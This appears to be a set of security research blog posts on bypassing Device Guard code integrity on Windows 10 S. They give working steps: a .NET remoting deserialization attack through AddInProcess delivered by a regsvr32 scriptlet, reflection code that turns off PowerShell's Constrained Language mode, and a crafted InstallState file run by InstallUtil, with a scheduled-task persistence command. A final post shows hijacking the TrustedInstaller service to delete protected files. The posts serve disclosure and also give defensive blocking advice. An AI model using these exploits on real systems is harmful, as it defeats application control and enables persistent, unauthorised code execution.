The interesting thing to point out here is the use of ChannelServices.RegisterChannel. This indicates that it's using .NET remoting to perform communication. Where have we seen .NET remoting before? Oh that's right, when I last broke .NET remoting. The main point is that not only is it using .NET remoting, which is basically broken, they're using it with BinaryFormatter in Full TypeFilterLevel mode, which means we can deserialize any data we like without worrying about the few security restrictions imposed, such as running everything inside a PermitOnly grant for SerializationFormatter permission.


The process is creating an IPC channel, which uses Windows named pipes. The name of the pipe is specified using the portName property, which is being passed on the command line. The process also takes a process ID, and it waits until that process exits. Therefore we can start AddInProcess with the following command line:


AddInProcess.exe /guid:32a91b0f-30cd-4c75-be79-ccbd6345de11 /pid:XXXX


Replace XXXX with the ID of a process which we know will stick around, such as Explorer. We'll find that the process creates the named pipe \\.\pipe\32a91b0f-30cd-4c75-be79-ccbd6345de11. The name of the service is configured using RemotingServices.Marshal, which in this case is AddInServer. Therefore we can build the remoting URI as ipc://32a91b0f-30cd-4c75-be79-ccbd6345de11/AddInServer and we can use my ExploitRemotingService tool to verify it's exploitable (on a non-DG Windows 10 machine of course).


[Screenshot: ExploitRemotingService confirming the IPC channel is exploitable]


We need to use the --useser flag with the ExploitRemotingService tool in order to not use the old exploits which MS fixed. The useser flag sends serialized objects and gets them back from the server, which allows you to do file operations such as listing directories and uploading/downloading files. This only works if the TypeFilterLevel is set to Full. This proves that the remoting channel is vulnerable to arbitrary deserialization. We can just replace the serialized bytes from my tool with the ones from my .NET DCOM exploit and we should get arbitrary code execution in the context of AddInProcess.


Now at this point we have an issue: if the only way to send data to this IPC server is by running a tool specially designed to communicate with a .NET remoting service, then we can already run arbitrary code and don't need a bypass. As the channel is a named pipe, perhaps we can exploit it remotely? No such luck; the .NET Framework creates the named pipe with an explicit security descriptor which blocks network access.


[Screenshot: the named pipe's security descriptor, which denies network access]


In theory, we could change the permissions, but even if we found a tool to do it, needing a second machine is a pain. So what to do? Fortunately for us, the .NET remoting protocol is pretty simple, at least when not used in a secure mode (which in this case it's not). It's a good example of a fire-and-forget protocol. No negotiation takes place at the start of the connection; the client just sends a correctly formatted set of bytes, including a header and the serialized Message, to the server, and if correct the server will respond. There are no secrets which need to be worked out, so we can create a binary file containing the serialized request ahead of time and just write it to the named pipe. If we massage the function which packages up the request from ExploitRemotingService and combine it with the .NET serialization exploit from earlier, we can generate a binary file which will exploit the .NET AddInProcess server.
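
If you could run your own code, writing the pre-built request to the pipe would only be a few lines of C#; a sketch (request.bin is the file generated ahead of time, and the GUID matches the AddInProcess command line):

using System.IO;
using System.IO.Pipes;

// Sketch: write a pre-built remoting request straight to the pipe.
byte[] request = File.ReadAllBytes("request.bin");
using (var pipe = new NamedPipeClientStream(".",
    "32a91b0f-30cd-4c75-be79-ccbd6345de11", PipeDirection.InOut)) {
    pipe.Connect();
    pipe.Write(request, 0, request.Length);
}

Of course, on Win10S we can't run this either, which is the problem solved below.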


If we have a file called request.bin the simplest way of writing this to the named pipe is to use CMD:


C:\> type request.bin > \\.\pipe\32a91b0f-30cd-4c75-be79-ccbd6345de11


This is great and really simple; it does sadly suffer from one tiny flaw, barely worth mentioning really… we can't run CMD. Oh well, back to the drawing board. What else can we use? While WSH is blocked, we can still run scriptlets in regsvr32. However, the scriptlet hosting environment is enlightened, which in the case of JScript/VBScript means you're severely limited in what COM objects you can create. One of the only objects you can create is Scripting.FileSystemObject, which allows you to open arbitrary text files and read/write to them. It supports opening named pipes as a byproduct of the fact that it also uses some of this functionality for handling process output. Therefore you can do something like the following to write arbitrary data to a named pipe.

var fso = new ActiveXObject("Scripting.FileSystemObject");
var pipe = "\\\\.\\pipe\\32A91B0F-30CD-4C75-BE79-CCBD6345DE11";
// Create a new ANSI text file object to the named pipe.
var file = fso.CreateTextFile(pipe, true, false);
// Write raw data to the pipe.
var data = "RAW DATA";
file.Write(data);
file.Close();


Unfortunately, nothing is ever simple. The request data is arbitrary binary, so I initially tried to use a Unicode text file, which makes writing binary data trivial. However, the class writes a Byte-Order-Mark (BOM) to the start when creating the file, which screws up the request. So I tried ANSI mode instead; however, this converts the UCS-2 characters from JScript into the current ANSI code page. On an English Windows system this is typically code page 1252, and you can build a mapping table between a UCS-2 character and an arbitrary 8 bit character. However, if your system is set to another code page, such as one of the more complex multi-byte character sets like Shift-JIS, this might be impossible. Anyway, I'm sure I could make it work on more platforms with a bit more effort, but it does the job: it allows me to load any arbitrary .NET code I like and execute it with the full DG Win10S policy enforced.
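
For reference, building the byte-to-character mapping table ahead of time is straightforward; a sketch assuming code page 1252:

using System.Text;

// Sketch: for each raw byte, find the UCS-2 character that the ANSI
// conversion (code page 1252 assumed) turns back into that byte.
Encoding ansi = Encoding.GetEncoding(1252);
char[] byte_to_char = new char[256];
for (int i = 0; i < 256; ++i) {
    byte_to_char[i] = ansi.GetString(new byte[] { (byte)i })[0];
}
// Encoding each request byte as byte_to_char[b] in the JScript string means
// the FileSystemObject's ANSI write converts it back to the original byte.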


I've uploaded the code to my GitHub here. Run the CreateAddInIpcData tool on another machine with the path to an IL-only .NET assembly and the name of the output scriptlet file. Make sure to give the scriptlet file an .sct extension. The .NET assembly must contain a single public class with an empty constructor to act as the entry point during deserialization. Some C# similar to the following should do it; just compile it into a class library assembly.


using System.Windows.Forms;

public class EntryPoint {
    public EntryPoint() {
        MessageBox.Show("Hello");
    }
}


Copy the output scriptlet file to the Win10S machine. Start AddInProcess with the earlier command line (make sure the GUID is the same as before, as the endpoint URI ends up in the serialized request) and specify a PID (get it from Task Manager). Make sure the AddInProcess executable doesn't immediately exit, which would indicate an error in your command line. Execute the scriptlet either by right clicking it in Explorer and selecting "Unregister" or manually using the following command from Explorer's Run dialog:


regsvr32 /s /n /u /i:c:\path\to\scriptlet.sct scrobj.dll


You should now find your arbitrary .NET gets executed in the context of AddInProcess. From here you can write any code you like, well except for loading unsigned .NET assemblies from a file on disk that is.


[Screenshot: the arbitrary .NET payload running inside AddInProcess]


That's all for now. It should be clear that UMCI and .NET do not mix very well, just as they didn't 4 years ago when I used similar tricks to break Windows RT. I've no idea if Microsoft have any future plans to limit things like loading .NET assemblies from memory (based on the response to issues like this, I doubt it).


If you're worried about this bypass you can block AddInProcess in your DG or AppLocker policy. However, until Microsoft find a solution to the Confused Deputy problem of .NET applications circumventing CI policy, there will certainly be other bypasses. If you want to add this binary to your DG policy I'd recommend following the instructions in this blog post. Don't forget to also blacklist AddInProcess32 while you're at it.

Next time, we’ll go into leveraging this arbitrary code execution to run some more analysis tools and perhaps even get Powershell back, providing a good example of why you should always write your tooling in .NET. ;-)

DG on Windows 10 S: Analysing the System

In the previous post, we got arbitrary .NET code execution on Win10S without needing a copy of Office or upgrading to Windows 10 Pro. This, however, doesn't really achieve our ultimate goal of running any application we like while UMCI is enforced. We can use the arbitrary code execution to run some analysis tools to understand Win10S better and facilitate further modifications to the system.

This post is mainly about how to implement a harness to load more complex .NET content in as simple a way as possible, including getting back a full PowerShell environment (within reason) without needing to run powershell.exe, one of the many blacklisted applications.

Dealing with Assembly Loading

Our simple .NET assembly we used in the last post only had dependencies on built-in, system assemblies. These system assemblies are supplied with the OS and so are signed with a Microsoft Windows Publisher certificate. This means the system assemblies are permitted to be loaded as image files by the system integrity policy. Anything we build ourselves of course isn’t going to be permitted to be loaded from files.

As we're loading our assembly from a byte array, the SI policy doesn't apply. For simple assemblies with only system dependencies, this isn't necessarily an issue. However, if we want to load more complex assemblies which reference other untrusted assemblies, we'll have more difficulty. Due to .NET using late binding, you might not immediately see an assembly loading issue; only when you try and access a method or type from that assembly will the Framework try and load it, leading to exceptions.

When an assembly is loaded, the Framework will parse the assembly name. Can we not just pre-load dependent assemblies from byte arrays, then let the loader resolve them when required? Let's try that by loading an assembly from a byte array and then reloading it by name. If preloading works, the load by name should be successful. Compile the following simple C# application, which will load the assembly from a byte array then try and load it again by its full name:

using System;
using System.IO;
using System.Reflection;

class Program
{
   static void Main(string[] args)
   {
       try
       {
           Assembly asm = Assembly.Load(File.ReadAllBytes(args[0]));
           Console.WriteLine(asm.FullName);
           Console.WriteLine(Assembly.Load(asm.FullName));
       }
       catch(Exception ex)
       {
           Console.WriteLine(ex.Message);
       }
   }
}

Now run this application and pass it the path to an assembly to load (ensure the assembly is outside of the directory you compiled the above code to). You should see output similar to the following:

C:\build\LoadAssemblyTest> LoadAssemblyTest.exe ..\test.dll
test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
Could not load file or assembly 'test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.

I guess it doesn't work, as loading the assembly by name throws an exception. This is a limitation in the way .NET loads assemblies from byte arrays: the name of the loaded assembly isn't registered in any global assembly table. On the one hand this is good, as it allows multiple assemblies with the same name to coexist in the same process. On the other hand it's bad, as it means that if we don't directly reference the Assembly instance we can't access anything in that assembly. As referenced assemblies are always loaded by name, this means that no amount of pre-loading is going to help get more complex assemblies to work.

The .NET Framework provides a solution to this problem: you can specify an Assembly Resolver event handler. The Assembly Resolver event is called whenever the runtime fails to find an assembly, either from the loaded assembly list or from a file on disk. This typically happens if the assembly is located outside of the application's base directory. It should be noted, however, that if the runtime finds a file on disk which matches its criteria it will try and load it. If this file isn't permitted by the SI policy the load will fail; however, the runtime does not consider that to be a failure from a resolving perspective, so it will not call our event handler in that case.

The event handler is passed a name to resolve. This name could be a partial name, or a full Assembly Name with additional information such as PublicKeyToken and Version. Therefore, we’ll just pass the name string to the AssemblyName class and use that to extract just the name of the assembly, nothing else. We can then use that name to search for a file with that name and a DLL or EXE extension. In the example bootstrap I’ve put up on Github, this defaults to searching either in the assembly directory in your user’s documents or an arbitrary list of paths specified in the ASSEMBLY_PATH environment variable. Finally, if we find the assembly file, we’ll load it from a byte array and return it to the event’s caller, making sure to cache the assembly file for later queries.

AssemblyName name = new AssemblyName(args.Name);
string path = FindAssemblyPath(name.Name, ".exe") ??
              FindAssemblyPath(name.Name, ".dll");
if (path != null) {
    Assembly asm = Assembly.Load(File.ReadAllBytes(path));
    _resolved_asms[args.Name] = asm;
    _resolved_asms[asm.FullName] = asm;
}
else {
    _resolved_asms[args.Name] = null;
}
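
For completeness, a sketch of wiring the handler up; the _resolved_asms cache and FindAssemblyPath are from the snippet above, while ResolveFromSearchPath and the surrounding class are hypothetical:

using System;
using System.Collections.Generic;
using System.Reflection;

// Sketch: hook AssemblyResolve so the body above runs whenever the runtime
// fails to find an assembly by name.
static Dictionary<string, Assembly> _resolved_asms =
    new Dictionary<string, Assembly>();

static void InstallResolver() {
    AppDomain.CurrentDomain.AssemblyResolve += (sender, args) => {
        if (!_resolved_asms.ContainsKey(args.Name)) {
            // The body from the snippet above populates _resolved_asms.
            ResolveFromSearchPath(args);
        }
        return _resolved_asms[args.Name];
    };
}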

The final step in the bootstrap code is to load an entry assembly using the ExecuteAssemblyByName method, as shown below. This entry assembly should contain a Main entry point, be called startasm.exe and be placed in the search path. You could put all your analysis code inside the bootstrap assembly, but that can quickly get large, and sending the serialized data to the AddInProcess named pipe isn't exactly efficient. Plus, by starting a new executable it's possible to quickly replace the functionality you want to run without needing to regenerate the scriptlet every time you change the assembly.
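
The call itself is a one-liner sketch; "startasm" matches the startasm.exe name so the resolver above supplies the bytes:

// Sketch: the load by name fails to find a permitted file, fires the
// resolver above, and then executes the returned assembly's Main.
AppDomain.CurrentDomain.ExecuteAssemblyByName("startasm", new string[0]);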

Note that if any assembly you want to load contains native code (e.g. mixed mode CIL and C++) then this isn't going to work. To run native code you need to load the assembly as an image; it doesn't work from a byte array. Of course, pure managed CIL can do pretty much everything native code can do, so always write your tools in .NET.

Bootstrapping a PowerShell Console

With the ability to execute any .NET assembly by name, including its dependencies, it's time we got an interactive environment running. And what better interactive environment to run than our old friend PowerShell. With PowerShell being written in .NET, it would make perfect sense that powershell.exe is also a .NET assembly.

[Screenshot: powershell.exe is not a managed .NET assembly]

I guess not, though it's worth noting that the PowerShell ISE is a full .NET assembly, so we could load that instead. But I prefer the command line version in most cases. There's research into getting PowerShell without powershell.exe, but at least in the examples I know of, such as https://github.com/p3nt4/PowerShdll, they don't tend to do it in a nice and easy way. Typically, they implement their own shell and pass PS scripts from the command line into a PowerShell runspace. Fortunately, we don't have to guess how powershell.exe works; while we could reverse engineer the binary, the core of the executable is now open source. For example, here's the unmanaged code for starting the console.

Boiling it down to the simplest code possible, the native entry point creates an instance of the UnmanagedPSEntry class and calls the Start method. As long as there exists a console for the process, calling Start presents a fully working PowerShell interactive environment. While AddInProcess is a console application already, you can call AllocConsole or AttachConsole to create a new console or attach to an existing one if necessary. We can even set the console title and icon while we're at it, to give us the warm feeling of running full PowerShell.

AllocConsole();
SetConsoleTitle("Windows Powershell");
UnmanagedPSEntry ps = new UnmanagedPSEntry();
ps.Start(null, new string[0]);
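
AllocConsole and SetConsoleTitle are native APIs, so the snippet assumes P/Invoke declarations along these lines:

using System.Runtime.InteropServices;

// P/Invoke declarations assumed by the snippet above.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool AllocConsole();
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
static extern bool SetConsoleTitle(string lpConsoleTitle);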

That should be it: we've got PowerShell running and everything's fine, at least until you start using the console, at which point you might encounter an error:

[Screenshot: a PowerShell error caused by Constrained Language mode]

It seems that while we've successfully bypassed the UMCI check for image loading, PowerShell still tries to enforce Constrained Language mode. This makes sense; all we've done is cut out loading powershell.exe, not the rest of the UMCI lockdown policy for PowerShell. The check for what mode to run in is the GetSystemLockdownPolicy method in the SystemPolicy class. This calls into the WldpGetLockdownPolicy function in the Windows Lockdown Policy DLL (WLDP) to query what to do for PowerShell. By passing null as the source path, the function returns the general system policy. This function is also the entry point for checking the policy for individual files; by passing a path to a signed script, the policy can be enforced selectively for scripts. This is how signed Microsoft modules run with Full Language mode while the main shell might run as Constrained. Having a look around, it's clear that the SystemPolicy class is caching the result of the policy lookup in the private systemLockdownPolicy static field. Therefore, if we use reflection to set this value to SystemEnforcementMode.None before calling into any other PS code, we'll disable the lockdown.

var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy",
        BindingFlags.NonPublic | BindingFlags.Static);
fi.SetValue(null, SystemEnforcementMode.None);

Doing this results in our desired PowerShell with no lockdown restrictions.

[Screenshot: PowerShell running in Full Language mode]

I've uploaded the RunPowershell implementation to GitHub. Build the executable and copy it to %USERPROFILE%\Documents\assembly\startasm.exe, then execute the bootstrap code using the previous DG bypass.

Poking Around the System

With PowerShell up and running, we can now do some inspection of the system. One of the first things I ensured I could do was install my NtObjectManager module. The Install-Module cmdlet doesn't work so well, as it tries to install the NuGet module, which won't load under the lockdown policy. Instead, you can just download the module's files, and if you specify the module's directory in the list of assembly paths for the bootstrap you can just import the PSD1 file and it should load successfully.

At this point, you can poke around yourself. I've added a couple of methods to the NtApiDotNet assembly to dump system information about the SI policy. For example, there's NtSystemInfo.CodeIntegrityOptions, which dumps the current CI enabled flags, as well as NtSystemInfo.CodeIntegrityFullPolicy, which uses a new option on Windows Creators Update (presumably for Win10S support) to dump all configured CI policies. The interesting thing when run on Win10S is that there are actually two policies enforced: the SI policy and what seems to be a revocation policy of some sort. By extracting policies this way, we can be sure we've got the policy the system is actually enforcing, not just the file we think is the policy.
[Screenshot: dumping the configured CI policies with NtSystemInfo.CodeIntegrityFullPolicy]

Finally, I've added a PowerShell cmdlet, New-NtKernelCrashDump, to create a kernel crash dump (don't worry, it doesn't crash the system) as long as you've got SeDebugPrivilege, which you can get by running AddInProcess as an administrator. While this doesn't allow you to modify the system, it does at least allow you to poke at the internal data structures to see what's what. Of course, you'll need to copy the kernel dump to another system in order to run WinDBG.

[Screenshot: creating a kernel crash dump with New-NtKernelCrashDump]

Wrap Up

This blog post was a very quick write up of getting more complex .NET content running on Win10S once you've got your foot in the door. I'd advocate writing your analysis tools in .NET wherever possible, as it just makes running them on a locked down system that much easier. Sure, you could use a reflective DLL loader, but why go to that level of effort when .NET already wrote one for you.

DG on Windows 10 S: Abusing InstallUtil

This is the final blog post I’m going to do on Windows 10 S. The previous parts are here, here and here. Originally, I was going to describe a way of completely removing the SI policy on Win10S without upgrading to Pro so that you can install any applications you like *ahem* while keeping secure boot etc. intact.


[Screenshot: Chrome running on Windows 10 S]


However, I decided that enforcing the SI policy was more about licensing than it was about security so I’ve thought better of it. If you really want to run arbitrary applications on your own computer:

  1. Don’t buy a Windows 10 S machine in the first place.
  2. Or, failing that, upgrade to Pro, at least for the Surface Laptop that’s still currently free.
  3. Or, failing that, work out how I removed the policy, it’s not that hard ;-)


Instead of disabling the entire policy, I'll detail another DG bypass. In this case, it's exploiting the same root cause as the previous one I disclosed, .NET loading untrusted code from a byte array through serialization, but with an interesting twist (*spoiler* it's not using BinaryFormatter, well mostly). Therefore, I don't think it makes that much difference to disclose it. MS, or at least the .NET team (hi Barry), are unlikely to fix the fundamental incompatibility between DG and .NET any time soon.

Is That You, NetDataContractSerializer?

It turns out that BinaryFormatter and .NET remoting were just too dangerous to let live, and MS finally removed them from .NET. Just kidding, MS did no such thing. While MS might put scary, if somewhat small, warnings up when you search for documentation on .NET remoting and BinaryFormatter, both technologies are still there in the .NET Framework and no warnings are produced when using them. In fact, BinaryFormatter is so awesome it's coming back in .NET Core 2.0, which is a bit of a shame IMHO.

What did happen in version 3.0 of the .NET Framework was the introduction of Windows Communication Foundation (WCF), a new object communication stack for accessing remote services. Learning well from the past, MS chose to use XML Web Services (well, perhaps they didn’t learn that well from the past) and instead of BinaryFormatter they implemented a new serialization mechanism, Data Contracts. The canonical implementation of WCF Data Contracts is the DataContractSerializer (DCS) class. In order to use the DCS class for serialization you are supposed to annotate your classes and properties with the DataContractAttribute and DataMemberAttribute. Explicitly annotated Data Contracts are not that interesting; however, clearly someone decided that it’d be great if there was a way of serializing existing serializable classes. Therefore, DCS also supports serializing arbitrary classes as long as they have the SerializableAttribute annotation, for example if you have the following C# class:

namespace DCSerializer {
  [Serializable]
  public class Contract {
    public int Value;
  }
}

If you run an instance of it through the DCS WriteObject method you’ll get the following XML content:

<Contract
   xmlns="http://schemas.datacontract.org/2004/07/DCSerializer"
   xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
 <Value>1234</Value>
</Contract>
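
For reference, the serialization side is nothing special; a minimal sketch, assuming the Contract class above is compiled in, looks like this:

using System;
using System.Runtime.Serialization;
using System.Xml;

class Program {
  static void Main() {
    // No known types are needed here as Contract is the root type.
    var dcs = new DataContractSerializer(typeof(DCSerializer.Contract));
    var contract = new DCSerializer.Contract { Value = 1234 };
    var settings = new XmlWriterSettings { Indent = true };
    using (var writer = XmlWriter.Create(Console.Out, settings)) {
      dcs.WriteObject(writer, contract);
    }
  }
}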

In theory, there’s enough information to deserialize this XML file without any special knowledge; the namespace (DCSerializer) and the class name (Contract) are reflected in the default XML namespace and root element name respectively. However, what’s missing is a reference to the assembly the Contract type exists in. This ambiguity is resolved by requiring that all known types (outside of some specific system types) be specified during construction or through a resolver. This isn’t a problem in a simple, well defined web service, but it does make DCS less useful as a general, exploitable serializer.

While DCS is awesome in its own way, the requirement for specifying all types is a weakness, at least from a lazy developer’s point of view. It would be nice if you could get some of the flexibility of the more general serializers such as BinaryFormatter. This is where the similar but different NetDataContractSerializer (NDCS) class comes into the picture. Both DCS and NDCS (and the related DataContractJsonSerializer) derive from the XmlObjectSerializer class, which allows NDCS to be used for WCF services instead of DCS if you so desire. Serializing the previous class through NDCS generates the following:

<Contract
 z:Id="1"
 z:Type="DCSerializer.Contract"
 z:Assembly="DCSerializer, Version=1.0.0.0"
 xmlns="http://schemas.datacontract.org/2004/07/DCSerializer"
 xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
 xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
 <Value>1234</Value>
</Contract>

The output from NDCS includes assembly information. Therefore NDCS works in a similar way to BinaryFormatter in that it doesn’t need any prior knowledge of the types being deserialized. This makes NDCS the equivalent of BinaryFormatter in XML format, though to be fair .NET already had something similar in SoapFormatter. This is a long winded way of saying: if you can find an application which will load an untrusted NDCS XML file, you can exploit it with the exact same set of serialization gadgets as BinaryFormatter from my previous post. The question therefore is, does such an application exist? Let’s look at one example.

The Ways of InstallUtil

InstallUtil is a .NET utility which is pre-installed with the .NET Framework. The utility has been available since at least v1.1 (I don’t have anything with v1.0 to check). Its purpose is to allow you to run installation code from an assembly so that you can configure system state and install your code. To use it normally, you first define a class which derives from the Installer class, annotate your class with the RunInstallerAttribute and then implement one of the main callback methods such as Install.

For example, the following class is sufficient to be executed by InstallUtil:

using System;
using System.Collections;
using System.ComponentModel;
using System.Configuration.Install;

[RunInstaller(true)]
public class TestInstaller : Installer {
  public override void Install(IDictionary stateSaver) {
    Console.WriteLine("Hello from the Installer");
    base.Install(stateSaver);
  }
}

If you compile the class into an assembly, you can then run the installer using the following command line and it will execute the Install method in your assembly:

InstallUtil path\to\installer.dll

The interesting thing about InstallUtil is it’s a known Application Whitelisting bypass (specifically against something like AppLocker). The executable is Microsoft signed, located in a system directory and will execute code from an arbitrary assembly file passed on the command line. However, what it isn’t is a DG bypass. InstallUtil loads the assembly from a file, and that file needs to be allowed to load by the SI policy, which means on Win10S we can only load existing assemblies signed by Microsoft. We might be able to find an assembly with an installer we could abuse, but I didn’t look very hard. Still, that doesn’t mean we can’t abuse InstallUtil in other ways.

If you run the simple installer through InstallUtil, you might notice a file which gets created next to the installer assembly file with an InstallState extension. This file begs for closer inspection. Opening it in a text editor you’ll encounter content which looks awfully familiar:

<ArrayOfKeyValueOfanyTypeanyType
 xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
 xmlns:x="http://www.w3.org/2001/XMLSchema"
 z:Id="1"
 z:Type="System.Collections.Hashtable"
 z:Assembly="0"
 xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"
 xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
...

This looks a lot like the output from an NDCS serialization. To confirm, we can go looking at the code in a decompiler (the assembly doesn’t seem to be available in the reference source). InstallUtil is actually just a thin wrapper around the ManagedInstallerClass class which is implemented in the System.Configuration.Install assembly. Poking around a bit, we find that AssemblyInstaller is using NDCS in a number of places. We’re not interested in places where NDCS is used to write out objects; rather, we’re interested in places where it’s reading. For example in the Uninstall method, there’s the following code:

public override void Uninstall(IDictionary savedState) {
  string installStatePath = GetInstallStatePath(Path);
  if (File.Exists(installStatePath)) {
    FileStream fileStream = new FileStream(installStatePath, FileMode.Open);
    XmlReader xmlReader = XmlReader.Create(fileStream);
    var ser = new NetDataContractSerializer();
    savedState = (IDictionary)ser.ReadObject(xmlReader);

    // Run uninstaller...
    base.Uninstall(savedState);
  }
}

From this snippet of code, we can see that the untrusted install state file is loaded verbatim with an insecure NDCS instance. If we can convince InstallUtil to load a crafted install state file which contains a deserialization chain to load an assembly from a byte array, we can bypass DG. While we can’t load untrusted assemblies, the utility doesn’t need a specific assembly, so we can just instruct it to uninstall a system assembly such as mscorlib. Don’t worry, it won’t actually do anything as mscorlib doesn’t contain any installers. Also, looking at the documentation there’s an InstallStateDir parameter we can pass to specify where the utility will look for our install state. If we copy the serialized file to c:\dummy\mscorlib.InstallState then we can get the DG bypass by running the following command:

InstallUtil /u /InstallStateDir=c:\dummy /AssemblyName mscorlib

I’ve updated my DG bypass Github repository to include this bypass as well. Run the CreateInstallState utility passing the path to the assembly to load (again it will instantiate the first public type it finds) and the output filename, such as mscorlib.InstallState. Execute the previous InstallUtil command and you should get your assembly executed. Note that InstallUtil will try and delete the InstallState file after use; if you don’t want that to happen you can just set the Read-Only flag on the file and the delete will fail.

The main advantage of this DG bypass over the previous one I disclosed in AddInProcess is that it’s easy to use for persistence. Just add a scheduled task which runs InstallUtil, or a LNK file in the startup folder with the appropriate command line, and the DG bypass will run when you log in.
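For example, a scheduled task along these lines should do the job (the task name and install state directory are arbitrary):

schtasks /Create /SC ONLOGON /TN NotMalware /TR "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /u /InstallStateDir=c:\dummy /AssemblyName mscorlib"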
As a final note, you might wonder how InstallUtil serialized the install state prior to v4 of the Framework, specifically as NDCS was only introduced in v3.0? Dropping the v2 System.Configuration.Install assembly into the decompiler we find it uses, *drum roll*, SoapFormatter. So it’s just as vulnerable to this attack in v2, assuming you’ve got v2 compatible gadgets (most v2 installs are really v3.5 so that’s typically a yes, as the gadgets I presented in the previous post were introduced in v3.0).

While this bypass exists currently in Win10S and likely in many custom DG policies, it’s easy to just ban InstallUtil as you would with AddInProcess and this would eliminate the bypass. Again I’ll give you a link to Matt Graeber’s blog post about adding new executables to your DG policy.

Final Wrap Up

This is the end of my planned series on Win10S. Hopefully, I’ve demonstrated that, regardless of the PR coming out of Microsoft, it’s not 100% secure, at least against anyone who knows you run Win10S and is willing to customize an attack to you or your organization. There will always be bypasses for DG, and the way Windows works, it’s almost impossible to completely lock it down. If it wasn’t .NET, it’d be a memory corruption vulnerability from an overlong command line parameter or something equally silly.

Does Win10S have no value whatsoever? Of course not, DG is a good, if not perfect, way of limiting a system to a very specific set of signed executables. I’d be less sceptical about Win10S if it hadn’t become so transparently a marketing ploy rather than a goal to really push the Windows platform forward. Unfortunately, I can’t see the goal of a secure Windows platform ever being reached without completely jettisoning all the reasons that Windows works for people at the moment.

I’d like to thank Matt Graeber for his knowledge of Device Guard and for doing reviews of these posts to make sure I’m not talking complete rubbish. Also shout outs to everyone looking for these sorts of issues such as Matt Nelson, Casey Smith, Alvaro Muñoz and no doubt others I’m forgetting.

The Art of Becoming TrustedInstaller

If you’ve spent any time administering a Windows system post-Vista you’ll have encountered the TrustedInstaller (TI) group which most system files and registry keys are ACL’ed to. If, for example, you look at the security for a file in System32 you’ll notice that only TI can delete or modify the file (not even the Administrators group is allowed) and that the Owner is also TI, so you can’t directly change the security either.


File Security Descriptor Dialog showing Trusted Installer as Owner


However, if you look in the Local Users and Groups application you won’t find a TI user or group. This blog post is about what the TI group really is, and more importantly, with the aid of PowerShell and the NtObjectManager module, how you can be TI to do whatever you want to do.

Where is TrustedInstaller?

If TI isn’t a user or group then what is it? Perhaps looking at the ACL more closely will give us some insight. We can use the Get-Acl cmdlet to read the security descriptor from a file and list the TI ACE.
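
For example, something like the following (any TI-owned file will do):

$acl = Get-Acl C:\Windows\System32\notepad.exe
$acl.Access | Where-Object { $_.IdentityReference -match "TrustedInstaller" }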

File ACL in PowerShell Showing Full TrustedInstaller name.


We can see in the IdentityReference member that we’ve got the TI group, and it’s prefixed with the domain “NT SERVICE”. Therefore, this is a Windows Service SID. This is a feature added in Vista to allow each running service to have groups which they can use for access checks, without the overhead of adding individual real groups to the local system.

The SID itself is generated on the fly as the SHA1 hash of the uppercase version of the service name. For example the following code will calculate the actual SID:

$name = "TrustedInstaller"
# Calculate the service SID
$bytes = [Text.Encoding]::Unicode.GetBytes($name.ToUpper())
$sha1 = [System.Security.Cryptography.SHA1]::Create()
$hash = $sha1.ComputeHash($bytes)
$rids = New-Object UInt32[] 5
[Buffer]::BlockCopy($hash, 0, $rids, 0, $hash.Length)
[string]::Format("S-1-5-80-{0}-{1}-{2}-{3}-{4}", `
    $rids[0], $rids[1], $rids[2], $rids[3], $rids[4])

Of course you don’t need to do this yourself; NTDLL has an RtlCreateServiceSid function, and LSASS will convert a service name to a SID and vice versa. Anyway, back to the point. What this means is that there’s a service called TrustedInstaller which must be running when system resources are modified. And that’s exactly what we find if we query with the SC utility:
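
sc.exe query TrustedInstaller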

trusted_installer_service.PNG


If we start the TI service and look at the Access Token we’ll see that it has the TI group enabled.

Access Token Showing TrustedInstaller SID


Enough of the background, assuming we’re an administrator how can we harness the power of TrustedInstaller?

Becoming TrustedInstaller

If you search on the Web for how to delete resources owned by TI you’ll tend to find articles that advocate manually taking ownership of the file or key, then changing the DACL to add the Administrators group. This is because even the usually compliant IFileOperation UAC COM object won’t do this automatically, as you’ll end up with the following dialog.

File Access Denied Dialog due to TrustedInstaller Owner

Changing the permissions on a system file isn’t exactly a great idea. If you do it wrong you could easily open up parts of your system to EoP issues, especially with directories. Explorer makes it easy to accidentally replace the security settings on all subfolders and files with little way of getting back the original values. Of course, the reason for TI is to stop you doing all this in the first place, but some people seem to really want to do it anyway.

You might assume you could just add your current user to the TI group and that’s that? Unfortunately the LSASS APIs such as NetLocalGroupAddMembers take a group name, not a SID, and passing “NT SERVICE\TrustedInstaller” doesn’t work, as it’s not a real group but created synthetically. There might be a magic incantation to do it, or at least a low-level RPC call, but I didn’t think it was worth the effort.

Therefore, the quick and dirty way would be to change the configuration of the TI service to run a different binary. Oddly, even though TI makes things on the system harder to mess with, it doesn’t protect its own service configuration from modification by a normal administrator. So you can issue a command such as the following to delete an arbitrary file as TI:

sc config TrustedInstaller binPath= "cmd.exe /C del path\to\file"

Start the TI service and *bang* the file is gone. Another reason this works is TI is not a Protected Process Light (PPL), which is odd because the TI group is given special permission to stop and delete PPL services. I pointed this out to MSRC (as Alex Ionescu did in 2013, which clearly I didn’t bother to read) but they didn’t do anything to fix it; no matter what they pretend, PPL isn’t a security boundary, well, until it is a security boundary.

This still feels like a hack, you’d have to restore the TI service to its original state otherwise things like Windows Update will get unhappy really quickly. As the TI service has a token with the correct groups, what about just starting the service then “borrowing” the Token from it to create a new process or for impersonation?

As an admin we’ve got SeDebugPrivilege so we can just open the TI process and then its token. Then we can do whatever we like with it. Simple really, let’s give that a try.
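
In NtObjectManager terms that’s roughly the following (a sketch; the service needs to be started first):

Start-Service TrustedInstaller
$p = Get-NtProcess -Name TrustedInstaller.exe
$token = Get-NtToken -Primary -Process $p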

PowerShell window showing capturing the token from TrustedInstaller process.

Well that was easy. Pat yourself on the back, grab a cold one, it’s time for some Trusted Installering…

PowerShell console showing token can't be used for a new process or impersonation

